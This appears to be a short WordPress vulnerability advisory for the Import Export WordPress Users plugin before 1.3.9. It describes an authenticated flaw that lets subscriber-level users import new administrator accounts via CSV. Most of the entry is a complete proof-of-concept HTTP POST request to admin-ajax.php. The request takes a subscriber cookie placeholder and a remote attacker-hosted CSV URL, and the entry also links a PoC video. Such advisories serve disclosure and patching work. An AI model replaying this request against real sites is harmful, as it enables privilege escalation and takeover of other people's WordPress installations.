wpexploit
Chloe Chamberland
WPEX-ID:B7C5E0F3-3D29-49CE-B93E-FCAE6B6E62A6
History: Mar 11, 2020 - 12:00 a.m.

Import Export WordPress Users < 1.3.9 - Authenticated Arbitrary User Creation


EPSS: 0.001 (Low), percentile 44.1%

“The flaw allowed anybody with subscriber-level access or above to import new users via a CSV file, including administrative-level users”, giving subscriber-level users and above the ability to escalate their privileges.

POST /wp-admin/admin-ajax.php?import_page=wordpress_hf_user_csv&step=3 HTTP/1.1
Host: EXAMPLE.com
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Origin: http://EXAMPLE.com
Referer: http://EXAMPLE.com/wp-admin/admin.php?import=wordpress_hf_user_csv&step=2
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: {SUB+ COOKIES}
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 133

action=user_csv_import_request&file=http://REMOTESITE.com/USERS.csv&start_pos=0&end_pos=

PoC video: https://www.youtube.com/watch?v=0ejJwbFJpcU
